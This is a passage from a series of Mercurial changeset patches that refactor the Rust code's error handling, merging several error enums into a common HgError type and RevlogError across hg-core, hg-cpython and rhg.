ListRevTrackedFilesError::AmbiguousPrefix - } - RevlogError::Corrupted => { - ListRevTrackedFilesError::CorruptedRevlog - } - RevlogError::UnknowDataFormat(format) => { - ListRevTrackedFilesError::UnknowRevlogDataFormat(format) - } - } - } -} - /// List files under Mercurial control at a given revision. pub fn list_rev_tracked_files( repo: &Repo, revset: &str, -) -> Result<FilesForRev, ListRevTrackedFilesError> { +) -> Result<FilesForRev, RevlogError> { let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; let manifest_node = Node::from_hex(&changelog_entry.manifest_node()?) - .or(Err(ListRevTrackedFilesError::CorruptedRevlog))?; + .map_err(|_| RevlogError::Corrupted)?; let manifest_entry = manifest.get_node(manifest_node.into())?; Ok(FilesForRev(manifest_entry)) } diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -7,10 +7,8 @@ mod dirstate_status; mod find_root; mod list_tracked_files; -pub use cat::{cat, CatRevError}; -pub use debugdata::{debug_data, DebugDataError, DebugDataKind}; +pub use cat::cat; +pub use debugdata::{debug_data, DebugDataKind}; pub use find_root::{find_root, find_root_from_path, FindRootError}; -pub use list_tracked_files::{ - list_rev_tracked_files, FilesForRev, ListRevTrackedFilesError, -}; +pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; pub use list_tracked_files::{Dirstate, ListDirstateTrackedFilesError}; diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -2,11 +2,9 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; use format_bytes::format_bytes; -use hg::operations::{ - CatRevError, DebugDataError, FindRootError, ListDirstateTrackedFilesError, - ListRevTrackedFilesError, -}; +use hg::operations::{FindRootError, ListDirstateTrackedFilesError}; use hg::requirements::RequirementsError; +use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; use std::convert::From; use std::path::PathBuf; @@ -99,27 +97,27 @@ } } -impl From<(DebugDataError, &str)> for CommandError { - fn from((err, rev): (DebugDataError, &str)) -> CommandError { +impl From<(RevlogError, &str)> for CommandError { + fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { - DebugDataError::IoError(err) => CommandError::Abort(Some( + RevlogError::IoError(err) => CommandError::Abort(Some( utf8_to_local(&format!("abort: {}\n", err)).into(), )), - DebugDataError::InvalidRevision => CommandError::Abort(Some( + RevlogError::InvalidRevision => CommandError::Abort(Some( utf8_to_local(&format!( - "abort: invalid revision identifier{}\n", + "abort: invalid revision identifier {}\n", rev )) .into(), )), - DebugDataError::AmbiguousPrefix => CommandError::Abort(Some( + RevlogError::AmbiguousPrefix => CommandError::Abort(Some( utf8_to_local(&format!( - "abort: ambiguous revision identifier{}\n", + "abort: ambiguous revision identifier {}\n", rev )) .into(), )), - DebugDataError::UnsuportedRevlogVersion(version) => { + RevlogError::UnsuportedVersion(version) => { CommandError::Abort(Some( utf8_to_local(&format!( "abort: unsupported revlog version {}\n", @@ -128,104 +126,10 @@ .into(), )) } - DebugDataError::CorruptedRevlog => { + RevlogError::Corrupted => { CommandError::Abort(Some("abort: corrupted revlog\n".into())) } - DebugDataError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } - } -} - -impl From<(ListRevTrackedFilesError, &str)> for CommandError { - fn from((err, rev): (ListRevTrackedFilesError, &str)) -> CommandError { - match err { - ListRevTrackedFilesError::IoError(err) => CommandError::Abort( - Some(utf8_to_local(&format!("abort: {}\n", err)).into()), - ), - ListRevTrackedFilesError::InvalidRevision => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesError::AmbiguousPrefix => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - ListRevTrackedFilesError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - ListRevTrackedFilesError::UnknowRevlogDataFormat(format) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - } - } -} - -impl From<(CatRevError, &str)> for CommandError { - fn from((err, rev): (CatRevError, &str)) -> CommandError { - match err { - CatRevError::IoError(err) => CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )), - CatRevError::InvalidRevision => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )), - CatRevError::AmbiguousPrefix => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )), - CatRevError::UnsuportedRevlogVersion(version) => { - CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - CatRevError::CorruptedRevlog => { - CommandError::Abort(Some("abort: corrupted revlog\n".into())) - } - CatRevError::UnknowRevlogDataFormat(format) => { + RevlogError::UnknowDataFormat(format) => { CommandError::Abort(Some( utf8_to_local(&format!( "abort: unknow revlog dataformat {:?}\n", # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611749989 -3600 # Wed Jan 27 13:19:49 2021 +0100 # Node ID 39e9407820ac571d6040b8672c32bb943f7438aa # Parent b274aa2f20fd61b272a004d367a3ae10ece72716 rust: Introduce an `HgError` enum for common error cases Differential Revision: https://phab.mercurial-scm.org/D9892 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/errors.rs @@ -0,0 +1,111 @@ +use std::fmt; + +/// Common error cases that can happen in many different APIs +#[derive(Debug)] +pub enum HgError { + IoError { + error: std::io::Error, + context: IoErrorContext, + }, + + /// A file under `.hg/` normally only written by Mercurial + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + CorruptedRepository(String), + + /// The respository or requested operation involves a feature not + /// supported by the Rust implementation. Falling back to the Python + /// implementation may or may not work. + /// + /// The given string is a short explanation for users, not intended to be + /// machine-readable. + UnsupportedFeature(String), +} + +/// Details about where an I/O error happened +#[derive(Debug, derive_more::From)] +pub enum IoErrorContext { + /// A filesystem operation returned `std::io::Error` + #[from] + File(std::path::PathBuf), + /// `std::env::current_dir` returned `std::io::Error` + CurrentDir, +} + +impl HgError { + pub fn corrupted(explanation: impl Into<String>) -> Self { + HgError::CorruptedRepository(explanation.into()) + } +} + +// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? +impl fmt::Display for HgError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + match self { + HgError::IoError { error, context } => { + write!(f, "{}: {}", error, context) + } + HgError::CorruptedRepository(explanation) => { + write!(f, "corrupted repository: {}", explanation) + } + HgError::UnsupportedFeature(explanation) => { + write!(f, "unsupported feature: {}", explanation) + } + } + } +} + +// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly? +impl fmt::Display for IoErrorContext { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + match self { + IoErrorContext::File(path) => path.display().fmt(f), + IoErrorContext::CurrentDir => f.write_str("current directory"), + } + } +} + +pub trait IoResultExt<T> { + /// Annotate a possible I/O error as related to a file at the given path. + /// + /// This allows printing something like “File not found: example.txt” + /// instead of just “File not found”. + /// + /// Converts a `Result` with `std::io::Error` into one with `HgError`. + fn for_file(self, path: &std::path::Path) -> Result<T, HgError>; +} + +impl<T> IoResultExt<T> for std::io::Result<T> { + fn for_file(self, path: &std::path::Path) -> Result<T, HgError> { + self.map_err(|error| HgError::IoError { + error, + context: IoErrorContext::File(path.to_owned()), + }) + } +} + +pub trait HgResultExt<T> { + /// Handle missing files separately from other I/O error cases. + /// + /// Wraps the `Ok` type in an `Option`: + /// + /// * `Ok(x)` becomes `Ok(Some(x))` + /// * An I/O "not found" error becomes `Ok(None)` + /// * Other errors are unchanged + fn io_not_found_as_none(self) -> Result<Option<T>, HgError>; +} + +impl<T> HgResultExt<T> for Result<T, HgError> { + fn io_not_found_as_none(self) -> Result<Option<T>, HgError> { + match self { + Ok(x) => Ok(Some(x)), + Err(HgError::IoError { error, .. }) + if error.kind() == std::io::ErrorKind::NotFound => + { + Ok(None) + } + Err(other_error) => Err(other_error), + } + } +} diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -5,6 +5,7 @@ // GNU General Public License version 2 or any later version. mod ancestors; pub mod dagops; +pub mod errors; pub use ancestors::{AncestorsIterator, LazyAncestors, MissingAncestors}; mod dirstate; pub mod discovery; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611751288 -3600 # Wed Jan 27 13:41:28 2021 +0100 # Node ID 68a15b5a7e58c37586938adb32a2468b4e1ec362 # Parent 39e9407820ac571d6040b8672c32bb943f7438aa rust: Replace DirstatePackError with HgError Differential Revision: https://phab.mercurial-scm.org/D9893 diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -3,10 +3,11 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. +use crate::errors::HgError; use crate::utils::hg_path::HgPath; use crate::{ dirstate::{CopyMap, EntryState, StateMap}, - DirstateEntry, DirstatePackError, DirstateParents, DirstateParseError, + DirstateEntry, DirstateParents, DirstateParseError, }; use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt}; use micro_timer::timed; @@ -90,7 +91,7 @@ copy_map: &CopyMap, parents: DirstateParents, now: Duration, -) -> Result<Vec<u8>, DirstatePackError> { +) -> Result<Vec<u8>, HgError> { // TODO move away from i32 before 2038. let now: i32 = now.as_secs().try_into().expect("time overflow"); @@ -136,16 +137,23 @@ new_filename.extend(copy.bytes()); } - packed.write_u8(entry.state.into())?; - packed.write_i32::<BigEndian>(entry.mode)?; - packed.write_i32::<BigEndian>(entry.size)?; - packed.write_i32::<BigEndian>(new_mtime)?; - packed.write_i32::<BigEndian>(new_filename.len() as i32)?; + // Unwrapping because `impl std::io::Write for Vec<u8>` never errors + packed.write_u8(entry.state.into()).unwrap(); + packed.write_i32::<BigEndian>(entry.mode).unwrap(); + packed.write_i32::<BigEndian>(entry.size).unwrap(); + packed.write_i32::<BigEndian>(new_mtime).unwrap(); + packed + .write_i32::<BigEndian>(new_filename.len() as i32) + .unwrap(); packed.extend(new_filename) } if packed.len() != expected_size { - return Err(DirstatePackError::BadSize(expected_size, packed.len())); + return Err(HgError::CorruptedRepository(format!( + "bad dirstate size: {} != {}", + expected_size, + packed.len() + ))); } Ok(packed) diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -79,19 +79,6 @@ } #[derive(Debug, PartialEq)] -pub enum DirstatePackError { - CorruptedEntry(String), - CorruptedParent, - BadSize(usize, usize), -} - -impl From<std::io::Error> for DirstatePackError { - fn from(e: std::io::Error) -> Self { - DirstatePackError::CorruptedEntry(e.to_string()) - } -} - -#[derive(Debug, PartialEq)] pub enum DirstateMapError { PathNotFound(HgPathBuf), EmptyPath, @@ -113,9 +100,9 @@ #[derive(Debug, derive_more::From)] pub enum DirstateError { Parse(DirstateParseError), - Pack(DirstatePackError), Map(DirstateMapError), IO(std::io::Error), + Common(errors::HgError), } #[derive(Debug, derive_more::From)] diff --git a/rust/hg-cpython/src/parsers.rs b/rust/hg-cpython/src/parsers.rs --- a/rust/hg-cpython/src/parsers.rs +++ b/rust/hg-cpython/src/parsers.rs @@ -15,8 +15,7 @@ }; use hg::{ pack_dirstate, parse_dirstate, utils::hg_path::HgPathBuf, DirstateEntry, - DirstatePackError, DirstateParents, DirstateParseError, FastHashMap, - PARENT_SIZE, + DirstateParents, DirstateParseError, FastHashMap, PARENT_SIZE, }; use std::convert::TryInto; @@ -128,18 +127,9 @@ } Ok(PyBytes::new(py, &packed)) } - Err(error) => Err(PyErr::new::<exc::ValueError, _>( - py, - match error { - DirstatePackError::CorruptedParent => { - "expected a 20-byte hash".to_string() - } - DirstatePackError::CorruptedEntry(e) => e, - DirstatePackError::BadSize(expected, actual) => { - format!("bad dirstate size: {} != {}", actual, expected) - } - }, - )), + Err(error) => { + Err(PyErr::new::<exc::ValueError, _>(py, error.to_string())) + } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611752421 -3600 # Wed Jan 27 14:00:21 2021 +0100 # Node ID 776b97179c0617424b71c039de1ce6eb4b7daab2 # Parent 68a15b5a7e58c37586938adb32a2468b4e1ec362 rust: Remove DirstateParseError and ListDirstateTrackedFilesError Use HgError instead. Differential Revision: https://phab.mercurial-scm.org/D9894 diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -5,7 +5,8 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::{utils::hg_path::HgPathBuf, DirstateParseError, FastHashMap}; +use crate::errors::HgError; +use crate::{utils::hg_path::HgPathBuf, FastHashMap}; use std::collections::hash_map; use std::convert::TryFrom; @@ -60,7 +61,7 @@ } impl TryFrom<u8> for EntryState { - type Error = DirstateParseError; + type Error = HgError; fn try_from(value: u8) -> Result<Self, Self::Error> { match value { @@ -69,8 +70,8 @@ b'r' => Ok(EntryState::Removed), b'm' => Ok(EntryState::Merged), b'?' => Ok(EntryState::Unknown), - _ => Err(DirstateParseError::CorruptedEntry(format!( - "Incorrect entry state {}", + _ => Err(HgError::CorruptedRepository(format!( + "Incorrect dirstate entry state {}", value ))), } diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -5,6 +5,7 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. +use crate::errors::HgError; use crate::revlog::node::NULL_NODE_ID; use crate::{ dirstate::{parsers::PARENT_SIZE, EntryState, SIZE_FROM_OTHER_PARENT}, @@ -14,7 +15,7 @@ hg_path::{HgPath, HgPathBuf}, }, CopyMap, DirsMultiset, DirstateEntry, DirstateError, DirstateMapError, - DirstateParents, DirstateParseError, FastHashMap, StateMap, + DirstateParents, FastHashMap, StateMap, }; use micro_timer::timed; use std::collections::HashSet; @@ -370,7 +371,9 @@ p2: NULL_NODE_ID, }; } else { - return Err(DirstateError::Parse(DirstateParseError::Damaged)); + return Err( + HgError::corrupted("Dirstate appears to be damaged").into() + ); } self.parents = Some(parents); diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -7,7 +7,7 @@ use crate::utils::hg_path::HgPath; use crate::{ dirstate::{CopyMap, EntryState, StateMap}, - DirstateEntry, DirstateParents, DirstateParseError, + DirstateEntry, DirstateParents, }; use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt}; use micro_timer::timed; @@ -27,11 +27,9 @@ ); #[timed] -pub fn parse_dirstate( - contents: &[u8], -) -> Result<ParseResult, DirstateParseError> { +pub fn parse_dirstate(contents: &[u8]) -> Result<ParseResult, HgError> { if contents.len() < PARENT_SIZE * 2 { - return Err(DirstateParseError::TooLittleData); + return Err(HgError::corrupted("Too little data for dirstate.")); } let mut copies = vec![]; let mut entries = vec![]; @@ -44,19 +42,21 @@ while curr_pos < contents.len() { if curr_pos + MIN_ENTRY_SIZE > contents.len() { - return Err(DirstateParseError::Overflow); + return Err(HgError::corrupted("Overflow in dirstate.")); } let entry_bytes = &contents[curr_pos..]; let mut cursor = Cursor::new(entry_bytes); - let state = EntryState::try_from(cursor.read_u8()?)?; - let mode = cursor.read_i32::<BigEndian>()?; - let size = cursor.read_i32::<BigEndian>()?; - let mtime = cursor.read_i32::<BigEndian>()?; - let path_len = cursor.read_i32::<BigEndian>()? as usize; + // Unwraping errors from `byteorder` as we’ve already checked + // `MIN_ENTRY_SIZE` so the input should never be too short. + let state = EntryState::try_from(cursor.read_u8().unwrap())?; + let mode = cursor.read_i32::<BigEndian>().unwrap(); + let size = cursor.read_i32::<BigEndian>().unwrap(); + let mtime = cursor.read_i32::<BigEndian>().unwrap(); + let path_len = cursor.read_i32::<BigEndian>().unwrap() as usize; if path_len > contents.len() - curr_pos { - return Err(DirstateParseError::Overflow); + return Err(HgError::corrupted("Overflow in dirstate.")); } // Slice instead of allocating a Vec needed for `read_exact` diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -51,33 +51,6 @@ /// write access to your repository, you have other issues. pub type FastHashMap<K, V> = HashMap<K, V, RandomXxHashBuilder64>; -#[derive(Clone, Debug, PartialEq)] -pub enum DirstateParseError { - TooLittleData, - Overflow, - // TODO refactor to use bytes instead of String - CorruptedEntry(String), - Damaged, -} - -impl From<std::io::Error> for DirstateParseError { - fn from(e: std::io::Error) -> Self { - DirstateParseError::CorruptedEntry(e.to_string()) - } -} - -impl ToString for DirstateParseError { - fn to_string(&self) -> String { - use crate::DirstateParseError::*; - match self { - TooLittleData => "Too little data for dirstate.".to_string(), - Overflow => "Overflow in dirstate.".to_string(), - CorruptedEntry(e) => format!("Corrupted entry: {:?}.", e), - Damaged => "Dirstate appears to be damaged.".to_string(), - } - } -} - #[derive(Debug, PartialEq)] pub enum DirstateMapError { PathNotFound(HgPathBuf), @@ -99,9 +72,7 @@ #[derive(Debug, derive_more::From)] pub enum DirstateError { - Parse(DirstateParseError), Map(DirstateMapError), - IO(std::io::Error), Common(errors::HgError), } diff --git a/rust/hg-core/src/operations/list_tracked_files.rs b/rust/hg-core/src/operations/list_tracked_files.rs --- a/rust/hg-core/src/operations/list_tracked_files.rs +++ b/rust/hg-core/src/operations/list_tracked_files.rs @@ -6,24 +6,16 @@ // GNU General Public License version 2 or any later version. use crate::dirstate::parsers::parse_dirstate; +use crate::errors::{HgError, IoResultExt}; use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::manifest::{Manifest, ManifestEntry}; use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; use crate::utils::hg_path::HgPath; -use crate::{DirstateParseError, EntryState}; +use crate::EntryState; use rayon::prelude::*; -/// Error type for `Dirstate` methods -#[derive(Debug, derive_more::From)] -pub enum ListDirstateTrackedFilesError { - /// Error when reading the `dirstate` file - IoError(std::io::Error), - /// Error when parsing the `dirstate` file - ParseError(DirstateParseError), -} - /// List files under Mercurial control in the working directory /// by reading the dirstate pub struct Dirstate { @@ -32,16 +24,18 @@ } impl Dirstate { - pub fn new(repo: &Repo) -> Result<Self, ListDirstateTrackedFilesError> { - let content = repo.hg_vfs().read("dirstate")?; + pub fn new(repo: &Repo) -> Result<Self, HgError> { + let content = repo + .hg_vfs() + .read("dirstate") + // TODO: this will be more accurate when we use `HgError` in + // `Vfs::read`. + .for_file("dirstate".as_ref())?; Ok(Self { content }) } - pub fn tracked_files( - &self, - ) -> Result<Vec<&HgPath>, ListDirstateTrackedFilesError> { - let (_, entries, _) = parse_dirstate(&self.content) - .map_err(ListDirstateTrackedFilesError::ParseError)?; + pub fn tracked_files(&self) -> Result<Vec<&HgPath>, HgError> { + let (_, entries, _) = parse_dirstate(&self.content)?; let mut files: Vec<&HgPath> = entries .into_iter() .filter_map(|(path, entry)| match entry.state { diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -10,5 +10,5 @@ pub use cat::cat; pub use debugdata::{debug_data, DebugDataKind}; pub use find_root::{find_root, find_root_from_path, FindRootError}; +pub use list_tracked_files::Dirstate; pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; -pub use list_tracked_files::{Dirstate, ListDirstateTrackedFilesError}; diff --git a/rust/hg-cpython/src/dirstate.rs b/rust/hg-cpython/src/dirstate.rs --- a/rust/hg-cpython/src/dirstate.rs +++ b/rust/hg-cpython/src/dirstate.rs @@ -24,10 +24,7 @@ exc, PyBytes, PyDict, PyErr, PyList, PyModule, PyObject, PyResult, PySequence, Python, }; -use hg::{ - utils::hg_path::HgPathBuf, DirstateEntry, DirstateParseError, EntryState, - StateMap, -}; +use hg::{utils::hg_path::HgPathBuf, DirstateEntry, EntryState, StateMap}; use libc::{c_char, c_int}; use std::convert::TryFrom; @@ -79,11 +76,10 @@ .map(|(filename, stats)| { let stats = stats.extract::<PySequence>(py)?; let state = stats.get_item(py, 0)?.extract::<PyBytes>(py)?; - let state = EntryState::try_from(state.data(py)[0]).map_err( - |e: DirstateParseError| { + let state = + EntryState::try_from(state.data(py)[0]).map_err(|e| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) - }, - )?; + })?; let mode = stats.get_item(py, 1)?.extract(py)?; let size = stats.get_item(py, 2)?.extract(py)?; let mtime = stats.get_item(py, 3)?.extract(py)?; diff --git a/rust/hg-cpython/src/dirstate/dirs_multiset.rs b/rust/hg-cpython/src/dirstate/dirs_multiset.rs --- a/rust/hg-cpython/src/dirstate/dirs_multiset.rs +++ b/rust/hg-cpython/src/dirstate/dirs_multiset.rs @@ -18,9 +18,9 @@ use crate::dirstate::extract_dirstate; use hg::{ + errors::HgError, utils::hg_path::{HgPath, HgPathBuf}, - DirsMultiset, DirsMultisetIter, DirstateMapError, DirstateParseError, - EntryState, + DirsMultiset, DirsMultisetIter, DirstateMapError, EntryState, }; py_class!(pub class Dirs |py| { @@ -38,7 +38,7 @@ skip_state = Some( skip.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, ); @@ -46,7 +46,7 @@ let inner = if let Ok(map) = map.cast_as::<PyDict>(py) { let dirstate = extract_dirstate(py, &map)?; DirsMultiset::from_dirstate(&dirstate, skip_state) - .map_err(|e| { + .map_err(|e: DirstateMapError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })? } else { diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -26,10 +26,10 @@ dirstate::{dirs_multiset::Dirs, make_dirstate_tuple}, }; use hg::{ + errors::HgError, utils::hg_path::{HgPath, HgPathBuf}, DirsMultiset, DirstateEntry, DirstateMap as RustDirstateMap, - DirstateMapError, DirstateParents, DirstateParseError, EntryState, - StateMapIter, PARENT_SIZE, + DirstateMapError, DirstateParents, EntryState, StateMapIter, PARENT_SIZE, }; // TODO @@ -84,13 +84,13 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, DirstateEntry { state: state.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, mode: mode.extract(py)?, @@ -113,7 +113,7 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, size.extract(py)?, @@ -137,7 +137,7 @@ HgPath::new(f.extract::<PyBytes>(py)?.data(py)), oldstate.extract::<PyBytes>(py)?.data(py)[0] .try_into() - .map_err(|e: DirstateParseError| { + .map_err(|e: HgError| { PyErr::new::<exc::ValueError, _>(py, e.to_string()) })?, ) diff --git a/rust/hg-cpython/src/parsers.rs b/rust/hg-cpython/src/parsers.rs --- a/rust/hg-cpython/src/parsers.rs +++ b/rust/hg-cpython/src/parsers.rs @@ -15,7 +15,7 @@ }; use hg::{ pack_dirstate, parse_dirstate, utils::hg_path::HgPathBuf, DirstateEntry, - DirstateParents, DirstateParseError, FastHashMap, PARENT_SIZE, + DirstateParents, FastHashMap, PARENT_SIZE, }; use std::convert::TryInto; @@ -58,21 +58,7 @@ .to_py_object(py), ) } - Err(e) => Err(PyErr::new::<exc::ValueError, _>( - py, - match e { - DirstateParseError::TooLittleData => { - "too little data for parents".to_string() - } - DirstateParseError::Overflow => { - "overflow in dirstate".to_string() - } - DirstateParseError::CorruptedEntry(e) => e, - DirstateParseError::Damaged => { - "dirstate appears to be damaged".to_string() - } - }, - )), + Err(e) => Err(PyErr::new::<exc::ValueError, _>(py, e.to_string())), } } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -2,7 +2,8 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; use format_bytes::format_bytes; -use hg::operations::{FindRootError, ListDirstateTrackedFilesError}; +use hg::errors::HgError; +use hg::operations::FindRootError; use hg::requirements::RequirementsError; use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; @@ -27,6 +28,9 @@ Abort(Option<Vec<u8>>), /// A mercurial capability as not been implemented. Unimplemented, + /// Common cases + #[from] + Other(HgError), } impl CommandError { @@ -42,6 +46,10 @@ CommandError::StderrError => exitcode::ABORT, CommandError::Abort(_) => exitcode::ABORT, CommandError::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, + CommandError::Other(HgError::UnsupportedFeature(_)) => { + exitcode::UNIMPLEMENTED_COMMAND + } + CommandError::Other(_) => exitcode::ABORT, } } @@ -141,21 +149,3 @@ } } } - -impl From<ListDirstateTrackedFilesError> for CommandError { - fn from(err: ListDirstateTrackedFilesError) -> Self { - match err { - ListDirstateTrackedFilesError::IoError(err) => { - CommandError::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )) - } - ListDirstateTrackedFilesError::ParseError(_) => { - CommandError::Abort(Some( - // TODO find a better error message - b"abort: parse error\n".to_vec(), - )) - } - } - } -} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611756291 -3600 # Wed Jan 27 15:04:51 2021 +0100 # Node ID 741e36f472a5022ce807b2f063098b3c86e23f54 # Parent 776b97179c0617424b71c039de1ce6eb4b7daab2 rhg: Print an error message in more cases Differential Revision: https://phab.mercurial-scm.org/D9895 diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -73,7 +73,16 @@ ) } CommandError::Abort(message) => message.to_owned(), - _ => None, + + CommandError::RequirementsError(_) + | CommandError::StdoutError + | CommandError::StderrError + | CommandError::Unimplemented + | CommandError::Other(HgError::UnsupportedFeature(_)) => None, + + CommandError::Other(e) => { + Some(format_bytes!(b"{}\n", e.to_string().as_bytes())) + } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611755949 -3600 # Wed Jan 27 14:59:09 2021 +0100 # Node ID 02d3bb972121437c19b53a83cc9360bb3f2b725f # Parent 741e36f472a5022ce807b2f063098b3c86e23f54 rust: replace RequirementsError with HgError Differential Revision: https://phab.mercurial-scm.org/D9896 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,3 +1,4 @@ +use crate::errors::HgError; use crate::operations::{find_root, FindRootError}; use crate::requirements; use memmap::{Mmap, MmapOptions}; @@ -33,9 +34,7 @@ find_root().map(Self::for_path) } - pub fn check_requirements( - &self, - ) -> Result<(), requirements::RequirementsError> { + pub fn check_requirements(&self) -> Result<(), HgError> { requirements::check(self) } diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,19 +1,7 @@ +use crate::errors::{HgError, HgResultExt, IoResultExt}; use crate::repo::Repo; -use std::io; -#[derive(Debug)] -pub enum RequirementsError { - // TODO: include a path? - Io(io::Error), - /// The `requires` file is corrupted - Corrupted, - /// The repository requires a feature that we don't support - Unsupported { - feature: String, - }, -} - -fn parse(bytes: &[u8]) -> Result<Vec<String>, ()> { +fn parse(bytes: &[u8]) -> Result<Vec<String>, HgError> { // The Python code reading this file uses `str.splitlines` // which looks for a number of line separators (even including a couple of // non-ASCII ones), but Python code writing it always uses `\n`. @@ -27,16 +15,21 @@ if line[0].is_ascii_alphanumeric() && line.is_ascii() { Ok(String::from_utf8(line.into()).unwrap()) } else { - Err(()) + Err(HgError::corrupted("parse error in 'requires' file")) } }) .collect() } -pub fn load(repo: &Repo) -> Result<Vec<String>, RequirementsError> { - match repo.hg_vfs().read("requires") { - Ok(bytes) => parse(&bytes).map_err(|()| RequirementsError::Corrupted), - +pub fn load(repo: &Repo) -> 